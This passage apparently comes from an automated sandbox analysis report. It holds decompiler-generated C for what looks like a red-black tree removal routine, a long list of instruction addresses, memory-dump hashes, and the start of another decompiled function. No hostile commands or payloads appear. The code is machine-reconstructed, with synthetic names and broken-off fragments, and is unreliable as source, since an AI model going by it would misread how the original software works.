																						goto L20;
																					}
																				}
																			}
																			_t452 = _t452 ^ _t423;
																		}
																		if(_t452 == 0) {
																			goto L170;
																		}
																		_t311 =  *(_t452 + 4);
																		if(_t444 != 0) {
																			if(_t311 != 0) {
																				_t311 = _t311 ^ _t452;
																			}
																		}
																		if(_t311 == _t423) {
																			if(_t444 != 0) {
																				L175:
																				_t295 = _t452 ^ _t426;
																				goto L169;
																			} else {
																				_t295 = _t426;
																				L169:
																				 *(_t452 + 4) = _t295;
																				goto L140;
																			}
																		} else {
																			_t312 =  *_t452;
																			if(_t444 != 0) {
																				if(_t312 != 0) {
																					_t312 = _t312 ^ _t452;
																				}
																			}
																			if(_t312 != _t423) {
																				goto L174;
																			} else {
																				if(_t444 != 0) {
																					_t314 = _t452 ^ _t426;
																				} else {
																					_t314 = _t426;
																				}
																				 *_t452 = _t314;
																				goto L140;
																			}
																		}
																	}
																}
															}
															L20:
															_t456 =  *_t426;
															_t307 = _t306 & 0x00000001;
															if(_t456 != 0) {
																if(_t307 != 0) {
																	_t456 = _t456 ^ _t426;
																}
																if(( *(_t456 + 8) & 0x00000001) == 0) {
																	goto L21;
																} else {
																	L56:
																	_t461 =  *(_t426 + _v12 * 4);
																	if(_t307 != 0) {
																		if(_t461 == 0) {
																			L59:
																			_t462 = _v16;
																			_t444 =  *(_t426 + _t462 * 4);
																			if(_t307 != 0) {
																				if(_t444 != 0) {
																					_t444 = _t444 ^ _t426;
																				}
																			}
																			 *(_t444 + 8) =  *(_t444 + 8) & 0x000000fe;
																			_t452 = _t462 ^ 0x00000001;
																			_t405 =  *(_t395 + 4) & 1;
																			_t316 =  *(_t444 + 8) & 0xfffffffc;
																			_v28 = _t405;
																			_v24 = _t452;
																			if(_t405 != 0) {
																				if(_t316 != 0) {
																					_t316 = _t316 ^ _t444;
																				}
																			}
																			if(_t316 != _t426) {
																				goto L174;
																			} else {
																				_t318 = _t452 ^ 0x00000001;
																				_v32 = _t318;
																				_t319 =  *(_t426 + _t318 * 4);
																				if(_t405 != 0) {
																					if(_t319 != 0) {
																						_t319 = _t319 ^ _t426;
																					}
																				}
																				if(_t319 != _t444) {
																					goto L174;
																				} else {
																					_t320 =  *(_t423 + _t452 * 4);
																					if(_t405 != 0) {
																						if(_t320 != 0) {
																							_t320 = _t320 ^ _t423;
																						}
																					}
																					if(_t320 != _t426) {
																						goto L174;
																					} else {
																						_t322 =  *(_t426 + 8) & 0xfffffffc;
																						if(_t405 != 0) {
																							if(_t322 != 0) {
																								_t322 = _t322 ^ _t426;
																							}
																						}
																						if(_t322 != _t423) {
																							goto L174;
																						} else {
																							_t464 = _t423 ^ _t444;
																							_t323 = _t464;
																							if(_t405 == 0) {
																								_t323 = _t444;
																							}
																							 *(_t423 + _v24 * 4) = _t323;
																							_t407 = _v28;
																							if(_t407 != 0) {
																								if(_t423 != 0) {
																									L72:
																									 *(_t444 + 8) =  *(_t444 + 8) & 0x00000003 | _t464;
																									_t328 =  *(_t444 + _v24 * 4);
																									if(_t407 != 0) {
																										if(_t328 == 0) {
																											L74:
																											if(_t407 != 0) {
																												if(_t328 != 0) {
																													_t328 = _t328 ^ _t426;
																												}
																											}
																											 *(_t426 + _v32 * 4) = _t328;
																											_t467 = _t426 ^ _t444;
																											_t329 = _t467;
																											if(_t407 == 0) {
																												_t329 = _t426;
																											}
																											 *(_t444 + _v24 * 4) = _t329;
																											if(_v28 == 0) {
																												_t467 = _t444;
																											}
																											_t395 = _a4;
																											_t452 = _t426;
																											 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t467;
																											_t426 = _t444;
																											L80:
																											 *(_t426 + 8) =  *(_t426 + 8) ^ ( *(_t426 + 8) ^  *(_t423 + 8)) & 0x00000001;
																											 *(_t423 + 8) =  *(_t423 + 8) & 0x000000fe;
																											 *(_t452 + 8) =  *(_t452 + 8) & 0x000000fe;
																											_t337 =  *(_t426 + 8) & 0xfffffffc;
																											_t444 =  *(_t395 + 4) & 1;
																											if(_t444 != 0) {
																												if(_t337 != 0) {
																													_t337 = _t337 ^ _t426;
																												}
																											}
																											if(_t337 != _t423) {
																												goto L174;
																											} else {
																												_t339 =  *(_t423 + _v12 * 4);
																												if(_t444 != 0) {
																													if(_t339 != 0) {
																														_t339 = _t339 ^ _t423;
																													}
																												}
																												if(_t339 != _t426) {
																													goto L174;
																												} else {
																													_t452 =  *(_t423 + 8) & 0xfffffffc;
																													if(_t444 != 0) {
																														if(_t452 == 0) {
																															L160:
																															if( *_t395 != _t423) {
																																goto L174;
																															} else {
																																 *_t395 = _t426;
																																L93:
																																if(_t444 != 0) {
																																	if(_t452 != 0) {
																																		_t452 = _t452 ^ _t426;
																																	}
																																}
																																_t409 = _v16;
																																 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t452;
																																_t343 =  *(_t426 + _t409 * 4);
																																if(_t444 != 0) {
																																	if(_t343 == 0) {
																																		goto L96;
																																	}
																																	_t343 = _t343 ^ _t426;
																																	goto L95;
																																} else {
																																	L95:
																																	if(_t343 != 0) {
																																		_t410 =  *(_t343 + 8);
																																		_t452 = _t410 & 0xfffffffc;
																																		if(_t444 != 0) {
																																			if(_t452 != 0) {
																																				_t452 = _t452 ^ _t343;
																																			}
																																		}
																																		if(_t452 != _t426) {
																																			goto L174;
																																		} else {
																																			if(_t444 != 0) {
																																				_t474 = _t343 ^ _t423;
																																			} else {
																																				_t474 = _t423;
																																			}
																																			 *(_t343 + 8) = _t410 & 0x00000003 | _t474;
																																			_t409 = _v16;
																																			goto L96;
																																		}
																																	}
																																	L96:
																																	if(_t444 != 0) {
																																		if(_t343 != 0) {
																																			_t343 = _t343 ^ _t423;
																																		}
																																	}
																																	 *(_t423 + _v12 * 4) = _t343;
																																	if(_t444 != 0) {
																																		_t345 = _t426 ^ _t423;
																																		_t470 = _t345;
																																	} else {
																																		_t345 = _t423;
																																		_t470 = _t426 ^ _t345;
																																	}
																																	 *(_t426 + _t409 * 4) = _t345;
																																	if(_t444 == 0) {
																																		_t470 = _t426;
																																	}
																																	_t306 =  *(_t423 + 8) & 0x00000003 | _t470;
																																	 *(_t423 + 8) = _t306;
																																	goto L24;
																																}
																															}
																														}
																														_t452 = _t452 ^ _t423;
																													}
																													if(_t452 == 0) {
																														goto L160;
																													}
																													_t348 =  *(_t452 + 4);
																													if(_t444 != 0) {
																														if(_t348 != 0) {
																															_t348 = _t348 ^ _t452;
																														}
																													}
																													if(_t348 == _t423) {
																														if(_t444 != 0) {
																															_t350 = _t452 ^ _t426;
																														} else {
																															_t350 = _t426;
																														}
																														 *(_t452 + 4) = _t350;
																														goto L93;
																													} else {
																														_t351 =  *_t452;
																														if(_t444 != 0) {
																															if(_t351 != 0) {
																																_t351 = _t351 ^ _t452;
																															}
																														}
																														if(_t351 != _t423) {
																															goto L174;
																														} else {
																															if(_t444 != 0) {
																																_t353 = _t452 ^ _t426;
																															} else {
																																_t353 = _t426;
																															}
																															 *_t452 = _t353;
																															goto L93;
																														}
																													}
																												}
																											}
																										}
																										_t328 = _t328 ^ _t444;
																									}
																									if(_t328 != 0) {
																										_t475 =  *(_t328 + 8);
																										_v20 = _t475;
																										_t452 = _t475 & 0xfffffffc;
																										if(_t407 != 0) {
																											if(_t452 != 0) {
																												_t452 = _t452 ^ _t328;
																											}
																										}
																										if(_t452 != _t444) {
																											goto L174;
																										} else {
																											if(_t407 != 0) {
																												_t477 = _t328 ^ _t426;
																											} else {
																												_t477 = _t426;
																											}
																											_v20 = _v20 & 0x00000003;
																											_v20 = _v20 | _t477;
																											 *(_t328 + 8) = _v20;
																											goto L74;
																										}
																									}
																									goto L74;
																								}
																							}
																							_t464 = _t423;
																							goto L72;
																						}
																					}
																				}
																			}
																		}
																		_t452 = _t461 ^ _t426;
																	}
																	if(_t452 == 0 || ( *(_t452 + 8) & 0x00000001) == 0) {
																		goto L59;
																	} else {
																		goto L80;
																	}
																}
															}
															L21:
															_t457 =  *(_t426 + 4);
															if(_t457 != 0) {
																if(_t307 != 0) {
																	_t457 = _t457 ^ _t426;
																}
																if(( *(_t457 + 8) & 0x00000001) == 0) {
																	goto L22;
																} else {
																	goto L56;
																}
															}
															L22:
															_t308 =  *(_t423 + 8);
															if((_t308 & 0x00000001) == 0) {
																 *(_t426 + 8) =  *(_t426 + 8) | 0x00000001;
																_t306 =  *(_t395 + 4);
																_t431 =  *(_t423 + 8) & 0xfffffffc;
																_t397 = _t306 & 0x00000001;
																if(_t397 != 0) {
																	if(_t431 == 0) {
																		goto L110;
																	}
																	_t423 = _t423 ^ _t431;
																	L111:
																	if(_t423 == 0) {
																		goto L24;
																	}
																	_t432 =  *(_t423 + 4);
																	if(_t397 != 0) {
																		if(_t432 != 0) {
																			_t432 = _t432 ^ _t423;
																		}
																	}
																	_v16 = 0 | _t432 == _t446;
																	_t395 = _a4;
																	goto L17;
																}
																L110:
																_t423 = _t431;
																goto L111;
															} else {
																_t306 = _t308 & 0x000000fe;
																 *(_t423 + 8) = _t306;
																 *(_t426 + 8) =  *(_t426 + 8) | 0x00000001;
																goto L24;
															}
														}
														L18:
														_t426 = _t452;
														goto L19;
													}
												}
												L13:
												_t306 = _t426;
												goto L14;
											}
										}
									}
									L41:
									_t366 = _v12;
									_v20 = _t452;
									goto L42;
								}
								L37:
								_t483 = _v24;
								goto L38;
							}
						}
					}
					L28:
					_t428 = _t452;
					goto L29;
				}
				_t385 = _v5;
				_t422 =  *(_t444 + 8) & 0xfffffffc;
				if(_t385 != 0) {
					if(_t422 != 0) {
						_t422 = _t422 ^ _t444;
					}
				}
				_v12 = _t444;
				if(_t422 == 0) {
					if(_t426 != 0) {
						 *(_t426 + 8) =  *(_t426 + 8) & 0x00000000;
					}
					_t425 = _a4;
					if( *_t425 != _t444) {
						goto L174;
					} else {
						_t425[4] = _t426;
						_t306 = _t425[4] & 0x00000001;
						if(_t306 != 0) {
							_t425[4] = _t425[4] | 0x00000001;
						}
						 *_t425 = _t426;
						goto L24;
					}
				} else {
					_t452 =  *(_t422 + 4);
					if(_t385 != 0) {
						if(_t452 != 0) {
							_t452 = _t452 ^ _t422;
						}
					}
					if(_t452 == _t444) {
						_v16 = 1;
						L11:
						_t373 =  *(_t444 + 8);
						goto L12;
					} else {
						_t387 =  *_t422;
						if(_v5 != 0) {
							if(_t387 != 0) {
								_t387 = _t387 ^ _t422;
							}
						}
						if(_t387 != _t444) {
							goto L174;
						} else {
							_t488 = _a4;
							_v16 = _v16 & 0x00000000;
							_t388 =  *(_t488 + 4);
							_v24 = _t388;
							if((_t388 & 0xfffffffe) == _t444) {
								if(_t426 != 0) {
									 *(_t488 + 4) = _t426;
									if((_v24 & 0x00000001) != 0) {
										_t390 = _t426;
										L228:
										 *(_t488 + 4) = _t390 | 0x00000001;
									}
									goto L11;
								}
								 *(_t488 + 4) = _t422;
								if((_v24 & 0x00000001) == 0) {
									goto L11;
								} else {
									_t390 = _t422;
									goto L228;
								}
							}
							goto L11;
						}
					}
				}
			}








































































































                                          0x033af90b
                                          0x033af911
                                          0x033af917
                                          0x033af919
                                          0x033af91c
                                          0x03405d63
                                          0x03405d69
                                          0x03405d69
                                          0x03405d63
                                          0x033af922
                                          0x033af927
                                          0x03405d72
                                          0x03405d78
                                          0x03405d78
                                          0x03405d72
                                          0x033af92d
                                          0x033af931
                                          0x033afa2d
                                          0x033afa2d
                                          0x033af939
                                          0x033af940
                                          0x033af944
                                          0x033afa37
                                          0x033afa39
                                          0x033afa3c
                                          0x033afa3e
                                          0x033afa41
                                          0x033afa48
                                          0x033afe68
                                          0x033afe6c
                                          0x033afe6c
                                          0x033afe78
                                          0x033afe78
                                          0x033afe7a
                                          0x033afe7a
                                          0x033afe7e
                                          0x033afe6e
                                          0x033afe6e
                                          0x033afe72
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x033afe80
                                          0x033afe80
                                          0x033afe83
                                          0x00000000
                                          0x033afe83
                                          0x03405d7f
                                          0x03405d81
                                          0x00000000
                                          0x00000000
                                          0x03405d87
                                          0x00000000
                                          0x03405d87
                                          0x033afa4e
                                          0x033afa50
                                          0x03405d90
                                          0x00000000
                                          0x00000000
                                          0x03405d98
                                          0x033afa58
                                          0x033afa58
                                          0x033afa5d
                                          0x033afa60
                                          0x033afa63
                                          0x033afa69
                                          0x033afa6b
                                          0x033afa6e
                                          0x033afa71
                                          0x03405da1
                                          0x03405da7
                                          0x03405da7
                                          0x03405da1
                                          0x033afa79
                                          0x033b0071
                                          0x033b0073
                                          0x033b0074
                                          0x00000000
                                          0x033afa7f
                                          0x033afa83
                                          0x033afa85
                                          0x03405dae
                                          0x03405dae
                                          0x033afa8b
                                          0x033afa8f
                                          0x033afa98
                                          0x033afaa1
                                          0x033afaa4
                                          0x033afaa6
                                          0x033afaa9
                                          0x033afaac
                                          0x03405db7
                                          0x03405dbd
                                          0x03405dbd
                                          0x03405db7
                                          0x033afab4
                                          0x00000000
                                          0x033afaba
                                          0x033afabc
                                          0x033afac2
                                          0x033afac5
                                          0x033afac7
                                          0x033afac7
                                          0x033afad6
                                          0x033afad9
                                          0x033afadf
                                          0x033afae2
                                          0x033afae4
                                          0x033afae7
                                          0x033afaea
                                          0x033afaed
                                          0x03405dc4
                                          0x03405dc9
                                          0x00000000
                                          0x00000000
                                          0x03405dcf
                                          0x033afaf6
                                          0x033afafa
                                          0x033afafc
                                          0x033afafc
                                          0x033afafe
                                          0x033afb01
                                          0x033afb09
                                          0x033afb0c
                                          0x033afb12
                                          0x033afb14
                                          0x033afb17
                                          0x03405dd6
                                          0x03405dd9
                                          0x03405dde
                                          0x00000000
                                          0x00000000
                                          0x03405de4
                                          0x03405de7
                                          0x033afb29
                                          0x033afb2c
                                          0x03405df3
                                          0x03405df6
                                          0x03405e06
                                          0x03405e0c
                                          0x03405e0f
                                          0x03405e11
                                          0x00000000
                                          0x03405e1f
                                          0x00000000
                                          0x03405e1f
                                          0x03405e11
                                          0x03405df8
                                          0x03405dfb
                                          0x03405e00
                                          0x00000000
                                          0x00000000
                                          0x03405e02
                                          0x00000000
                                          0x03405e02
                                          0x033afb32
                                          0x033afb35
                                          0x033afb3c
                                          0x03405e26
                                          0x03405e28
                                          0x03405e28
                                          0x03405e2e
                                          0x03405e3c
                                          0x03405e3c
                                          0x03405e2e
                                          0x033afb45
                                          0x033afb47
                                          0x033afb53
                                          0x033afb56
                                          0x033afb59
                                          0x033afb5c
                                          0x033afb65
                                          0x033b000d
                                          0x00000000
                                          0x033b000f
                                          0x033b000f
                                          0x00000000
                                          0x033b000f
                                          0x033afb6b
                                          0x033afb6e
                                          0x033afb71
                                          0x033afb73
                                          0x033afb76
                                          0x03405e45
                                          0x03405e4b
                                          0x03405e4b
                                          0x03405e45
                                          0x033afb80
                                          0x033afb83
                                          0x03405e54
                                          0x03405e5a
                                          0x03405e5a
                                          0x03405e54
                                          0x033afb89
                                          0x033afb98
                                          0x033afb9b
                                          0x033afb9e
                                          0x033afba0
                                          0x03405e63
                                          0x03405e69
                                          0x03405e69
                                          0x03405e63
                                          0x033afba8
                                          0x00000000
                                          0x033afbae
                                          0x033afbb2
                                          0x03405e70
                                          0x033afbb8
                                          0x033afbb8
                                          0x033afbb8
                                          0x033afbbd
                                          0x033afbbf
                                          0x033afbbf
                                          0x033af9a8
                                          0x033af9a8
                                          0x033af9ad
                                          0x033af9b4
                                          0x03405eda
                                          0x00000000
                                          0x00000000
                                          0x03405ee2
                                          0x033af9bc
                                          0x033af9bc
                                          0x033af9bf
                                          0x033af9c4
                                          0x033afde6
                                          0x033afde9
                                          0x033afdec
                                          0x033afdef
                                          0x033afdf2
                                          0x03405eeb
                                          0x03405ef1
                                          0x03405ef1
                                          0x03405eeb
                                          0x033afdfa
                                          0x00000000
                                          0x033afe00
                                          0x033afe04
                                          0x03405efa
                                          0x03405f00
                                          0x03405f00
                                          0x03405efa
                                          0x033afe0a
                                          0x033afa24
                                          0x033afa2a
                                          0x033afa2a
                                          0x033afdfa
                                          0x033af9cd
                                          0x00000000
                                          0x033af9cf
                                          0x033af9cf
                                          0x033af9d1
                                          0x033af9d4
                                          0x033af9d7
                                          0x033af9d9
                                          0x033af9dc
                                          0x033af9df
                                          0x033af9e2
                                          0x033af9e7
                                          0x03405f09
                                          0x00000000
                                          0x00000000
                                          0x03405f11
                                          0x033af9ef
                                          0x033af9f3
                                          0x033afed5
                                          0x033afed8
                                          0x033afedb
                                          0x03405f1a
                                          0x03405f20
                                          0x03405f20
                                          0x03405f1a
                                          0x033afee3
                                          0x00000000
                                          0x033afee9
                                          0x033afeeb
                                          0x03405f29
                                          0x03405f2f
                                          0x03405f2f
                                          0x03405f29
                                          0x033afef3
                                          0x00000000
                                          0x033afef9
                                          0x033afefc
                                          0x033aff01
                                          0x03405f38
                                          0x033b0052
                                          0x033b0054
                                          0x00000000
                                          0x033b0056
                                          0x033b0056
                                          0x033aff40
                                          0x033aff42
                                          0x03405f6e
                                          0x03405f74
                                          0x03405f74
                                          0x03405f6e
                                          0x033aff50
                                          0x033aff56
                                          0x033aff5b
                                          0x03405f7d
                                          0x00000000
                                          0x00000000
                                          0x03405f83
                                          0x00000000
                                          0x033aff61
                                          0x033aff61
                                          0x033aff63
                                          0x033b0021
                                          0x033b0026
                                          0x033b002b
                                          0x033b007e
                                          0x033b0080
                                          0x033b0080
                                          0x033b007e
                                          0x033b002f
                                          0x00000000
                                          0x033b0031
                                          0x033b0033
                                          0x033b0086
                                          0x033b0035
                                          0x033b0035
                                          0x033b0035
                                          0x033b003c
                                          0x00000000
                                          0x033b003c
                                          0x033b002f
                                          0x033aff69
                                          0x033aff6b
                                          0x03405f8c
                                          0x03405f92
                                          0x03405f92
                                          0x03405f8c
                                          0x033aff74
                                          0x033aff77
                                          0x033aff7b
                                          0x03405f99
                                          0x03405f9b
                                          0x033aff81
                                          0x033aff81
                                          0x033aff83
                                          0x033aff83
                                          0x033aff88
                                          0x033aff8b
                                          0x033aff90
                                          0x033aff92
                                          0x033aff92
                                          0x033aff9c
                                          0x033affa2
                                          0x033affa6
                                          0x033affaa
                                          0x033affad
                                          0x033affb2
                                          0x03405fa4
                                          0x03405faa
                                          0x03405faa
                                          0x03405fa4
                                          0x033affb8
                                          0x00000000
                                          0x033affb8
                                          0x033aff5b
                                          0x033b0054
                                          0x03405f3e
                                          0x03405f3e
                                          0x033aff09
                                          0x00000000
                                          0x00000000
                                          0x033aff0f
                                          0x033aff14
                                          0x03405f47
                                          0x03405f4d
                                          0x03405f4d
                                          0x03405f47
                                          0x033aff1c
                                          0x033b0046
                                          0x033b0076
                                          0x033b0078
                                          0x00000000
                                          0x033b0048
                                          0x033b0048
                                          0x033b004a
                                          0x033b004a
                                          0x00000000
                                          0x033b004a
                                          0x033aff22
                                          0x033aff22
                                          0x033aff26
                                          0x03405f56
                                          0x03405f5c
                                          0x03405f5c
                                          0x03405f56
                                          0x033aff2e
                                          0x00000000
                                          0x033aff34
                                          0x033aff36
                                          0x03405f65
                                          0x033aff3c
                                          0x033aff3c
                                          0x033aff3c
                                          0x033aff3e
                                          0x00000000
                                          0x033aff3e
                                          0x033aff2e
                                          0x033aff1c
                                          0x033afef3
                                          0x033afee3
                                          0x033af9f9
                                          0x033af9f9
                                          0x033af9fb
                                          0x033af9ff
                                          0x033afbd5
                                          0x03405fb1
                                          0x03405fb1
                                          0x033afbdf
                                          0x00000000
                                          0x033afbe5
                                          0x033afbe5
                                          0x033afbe8
                                          0x033afbed
                                          0x03405fdf
                                          0x033afc01
                                          0x033afc01
                                          0x033afc04
                                          0x033afc09
                                          0x03405fee
                                          0x03405ff4
                                          0x03405ff4
                                          0x03405fee
                                          0x033afc0f
                                          0x033afc13
                                          0x033afc1d
                                          0x033afc20
                                          0x033afc23
                                          0x033afc26
                                          0x033afc2b
                                          0x03405ffd
                                          0x03406003
                                          0x03406003
                                          0x03405ffd
                                          0x033afc33
                                          0x00000000
                                          0x033afc39
                                          0x033afc3b
                                          0x033afc3e
                                          0x033afc41
                                          0x033afc46
                                          0x0340600c
                                          0x03406012
                                          0x03406012
                                          0x0340600c
                                          0x033afc4e
                                          0x00000000
                                          0x033afc54
                                          0x033afc54
                                          0x033afc59
                                          0x0340601b
                                          0x03406021
                                          0x03406021
                                          0x0340601b
                                          0x033afc61
                                          0x00000000
                                          0x033afc67
                                          0x033afc6a
                                          0x033afc6f
                                          0x0340602a
                                          0x03406030
                                          0x03406030
                                          0x0340602a
                                          0x033afc77
                                          0x00000000
                                          0x033afc7d
                                          0x033afc7f
                                          0x033afc81
                                          0x033afc85
                                          0x033afc87
                                          0x033afc87
                                          0x033afc8c
                                          0x033afc8f
                                          0x033afc94
                                          0x03406039
                                          0x033afc9c
                                          0x033afca4
                                          0x033afcaa
                                          0x033afcaf
                                          0x03406046
                                          0x033afcbd
                                          0x033afcbf
                                          0x0340606d
                                          0x03406073
                                          0x03406073
                                          0x0340606d
                                          0x033afcc8
                                          0x033afccd
                                          0x033afccf
                                          0x033afcd3
                                          0x033afcd5
                                          0x033afcd5
                                          0x033afcde
                                          0x033afce1
                                          0x033afce3
                                          0x033afce3
                                          0x033afce8
                                          0x033afcf0
                                          0x033afcf2
                                          0x033afcf5
                                          0x033afcf7
                                          0x033afcff
                                          0x033afd02
                                          0x033afd06
                                          0x033afd11
                                          0x033afd14
                                          0x033afd17
                                          0x0340607c
                                          0x03406082
                                          0x03406082
                                          0x0340607c
                                          0x033afd1f
                                          0x00000000
                                          0x033afd25
                                          0x033afd28
                                          0x033afd2d
                                          0x0340608b
                                          0x03406091
                                          0x03406091
                                          0x0340608b
                                          0x033afd35
                                          0x00000000
                                          0x033afd3b
                                          0x033afd3e
                                          0x033afd43
                                          0x0340609a
                                          0x033b0016
                                          0x033b0018
                                          0x00000000
                                          0x033b001a
                                          0x033b001a
                                          0x033afd82
                                          0x033afd84
                                          0x034060d9
                                          0x034060df
                                          0x034060df
                                          0x034060d9
                                          0x033afd8d
                                          0x033afd95
                                          0x033afd98
                                          0x033afd9d
                                          0x034060e8
                                          0x00000000
                                          0x00000000
                                          0x034060ee
                                          0x00000000
                                          0x033afda3
                                          0x033afda3
                                          0x033afda5
                                          0x033afe8b
                                          0x033afe90
                                          0x033afe95
                                          0x034060f7
                                          0x034060fd
                                          0x034060fd
                                          0x034060f7
                                          0x033afe9d
                                          0x00000000
                                          0x033afea3
                                          0x033afea5
                                          0x03406106
                                          0x033afeab
                                          0x033afeab
                                          0x033afeab
                                          0x033afeb2
                                          0x033afeb5
                                          0x00000000
                                          0x033afeb5
                                          0x033afe9d
                                          0x033afdab
                                          0x033afdad
                                          0x0340610f
                                          0x03406115
                                          0x03406115
                                          0x0340610f
                                          0x033afdb6
                                          0x033afdbb
                                          0x0340611e
                                          0x03406120
                                          0x033afdc1
                                          0x033afdc1
                                          0x033afdc5
                                          0x033afdc5
                                          0x033afdc7
                                          0x033afdcc
                                          0x033afdce
                                          0x033afdce
                                          0x033afdd6
                                          0x033afdd8
                                          0x00000000
                                          0x033afdd8
                                          0x033afd9d
                                          0x033b0018
                                          0x034060a0
                                          0x034060a0
                                          0x033afd4b
                                          0x00000000
                                          0x00000000
                                          0x033afd51
                                          0x033afd56
                                          0x034060a9
                                          0x034060af
                                          0x034060af
                                          0x034060a9
                                          0x033afd5e
                                          0x033afebf
                                          0x034060b8
                                          0x033afec5
                                          0x033afec5
                                          0x033afec5
                                          0x033afec7
                                          0x00000000
                                          0x033afd64
                                          0x033afd64
                                          0x033afd68
                                          0x034060c1
                                          0x034060c7
                                          0x034060c7
                                          0x034060c1
                                          0x033afd70
                                          0x00000000
                                          0x033afd76
                                          0x033afd78
                                          0x034060d0
                                          0x033afd7e
                                          0x033afd7e
                                          0x033afd7e
                                          0x033afd80
                                          0x00000000
                                          0x033afd80
                                          0x033afd70
                                          0x033afd5e
                                          0x033afd35
                                          0x033afd1f
                                          0x0340604c
                                          0x0340604c
                                          0x033afcb7
                                          0x033affc0
                                          0x033affc3
                                          0x033affc6
                                          0x033affcb
                                          0x03406055
                                          0x0340605b
                                          0x0340605b
                                          0x03406055
                                          0x033affd3
                                          0x00000000
                                          0x033affd9
                                          0x033affdb
                                          0x03406064
                                          0x033affe1
                                          0x033affe1
                                          0x033affe1
                                          0x033affe3
                                          0x033affe7
                                          0x033affed
                                          0x00000000
                                          0x033affed
                                          0x033affd3
                                          0x00000000
                                          0x033afcb7
                                          0x0340603f
                                          0x033afc9a
                                          0x00000000
                                          0x033afc9a
                                          0x033afc77
                                          0x033afc61
                                          0x033afc4e
                                          0x033afc33
                                          0x03405fe5
                                          0x03405fe5
                                          0x033afbf5
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x033afbf5
                                          0x033afbdf
                                          0x033afa05
                                          0x033afa05
                                          0x033afa0a
                                          0x033afe14
                                          0x03405fb8
                                          0x03405fb8
                                          0x033afe1e
                                          0x00000000
                                          0x033afe24
                                          0x00000000
                                          0x033afe24
                                          0x033afe1e
                                          0x033afa10
                                          0x033afa10
                                          0x033afa15
                                          0x033afe29
                                          0x033afe2d
                                          0x033afe35
                                          0x033afe38
                                          0x033afe3b
                                          0x03405fc1
                                          0x00000000
                                          0x00000000
                                          0x03405fc7
                                          0x033afe43
                                          0x033afe45
                                          0x00000000
                                          0x00000000
                                          0x033afe4b
                                          0x033afe50
                                          0x03405fd0
                                          0x03405fd6
                                          0x03405fd6
                                          0x03405fd0
                                          0x033afe5d
                                          0x033afe60
                                          0x00000000
                                          0x033afe60
                                          0x033afe41
                                          0x033afe41
                                          0x00000000
                                          0x033afa1b
                                          0x033afa1b
                                          0x033afa1d
                                          0x033afa20
                                          0x00000000
                                          0x033afa20
                                          0x033afa15
                                          0x033af9ed
                                          0x033af9ed
                                          0x00000000
                                          0x033af9ed
                                          0x033af9cd
                                          0x033af9ba
                                          0x033af9ba
                                          0x00000000
                                          0x033af9ba
                                          0x033afba8
                                          0x033afb65
                                          0x033afb1d
                                          0x033afb23
                                          0x033afb26
                                          0x00000000
                                          0x033afb26
                                          0x033afaf3
                                          0x033afaf3
                                          0x00000000
                                          0x033afaf3
                                          0x033afab4
                                          0x033afa79
                                          0x033afa56
                                          0x033afa56
                                          0x00000000
                                          0x033afa56
                                          0x033af94d
                                          0x033af950
                                          0x033af955
                                          0x03405e79
                                          0x03405e7f
                                          0x03405e7f
                                          0x03405e79
                                          0x033af95b
                                          0x033af960
                                          0x03405e88
                                          0x03405e8a
                                          0x03405e8a
                                          0x03405e8e
                                          0x03405e93
                                          0x00000000
                                          0x03405e99
                                          0x03405e9c
                                          0x03405e9f
                                          0x03405ea1
                                          0x03405ea3
                                          0x03405ea3
                                          0x03405ea7
                                          0x00000000
                                          0x03405ea7
                                          0x033af966
                                          0x033af966
                                          0x033af96b
                                          0x03405eb0
                                          0x03405eb6
                                          0x03405eb6
                                          0x03405eb0
                                          0x033af973
                                          0x033afbc7
                                          0x033af9a5
                                          0x033af9a5
                                          0x00000000
                                          0x033af979
                                          0x033af97d
                                          0x033af97f
                                          0x03405ebf
                                          0x03405ec5
                                          0x03405ec5
                                          0x03405ebf
                                          0x033af987
                                          0x00000000
                                          0x033af98d
                                          0x033af98d
                                          0x033af990
                                          0x033af994
                                          0x033af997
                                          0x033af99f
                                          0x033afff7
                                          0x033b0061
                                          0x033b0064
                                          0x033b006a
                                          0x03405ece
                                          0x03405ed0
                                          0x03405ed0
                                          0x00000000
                                          0x033b0064
                                          0x033afffd
                                          0x033b0000
                                          0x00000000
                                          0x033b0006
                                          0x03405ecc
                                          0x00000000
                                          0x03405ecc
                                          0x033b0000
                                          0x00000000
                                          0x033af99f
                                          0x033af987
                                          0x033af973

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fc66cec98a30fadb5342584c4926ef08b8d30d1ee31ce6150576712f1cb138a4
                                          • Instruction ID: 0f904a3a071666aa6a9352fdb5590aed8b04829252fa3f9d333db9f2f139f90b
                                          • Opcode Fuzzy Hash: fc66cec98a30fadb5342584c4926ef08b8d30d1ee31ce6150576712f1cb138a4
                                          • Instruction Fuzzy Hash: 1462E631A04A529BCB26CE2CCDC02ABFBB9EF45714F1D82E9CC959B395D375D8418B80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03475BA5, Relevance: .6, Instructions: 592COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 88%
                                          			E03475BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
